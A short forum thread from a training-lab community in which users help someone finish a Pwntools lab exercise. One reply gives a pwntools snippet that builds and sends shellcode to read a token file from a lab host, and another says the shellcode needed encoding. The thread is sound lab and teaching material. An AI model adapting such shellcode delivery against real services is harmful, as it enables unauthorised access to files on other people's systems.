Forum Discussion

kdkstudies's avatar
kdkstudies
Icon for Bronze I rankBronze I
10 months ago
Solved

Need Help for Pwntools: Ep. 6 — Demonstrate Your Skills

I'm trying to solve an lab in Immersive labs Pwntools: Ep. 6 — Demonstrate Your Skills And I got stuck in the last step. I've tried the solution for using cat2 (from https://www.reddit.com/r/immers...
application security
defensive cyber
immersive labs
  • steven's avatar
    steven
    10 months ago

    well, as indicated in reddit sub:

    ...
shellcode = shellcraft.cat2("/home/token-user/token.txt", 1, 40) + shellcraft.ret(0)
shellcode = asm(shellcode)
print ("Sending Shellcode:",shellcode, " ---#")
io.send(shellcode)
io.sendline()
...

    should work.

    looking at my old solution I see that I remote connected:

    io = remote('10.102.180.68',5000)

    somehow I don't see this in your code.

    could it be (it's been a long time) that you're working on the wrong endpoint?

netcat's avatar
netcat
Icon for Silver III rankSilver III
10 months ago

For me these approaches didn't work. And while the source code suggests the shellcode is treated 100% binary, I had to encode it. After getting rid of whitespaces etc. the shellcode worked.

I can add more hints, if this was too vague.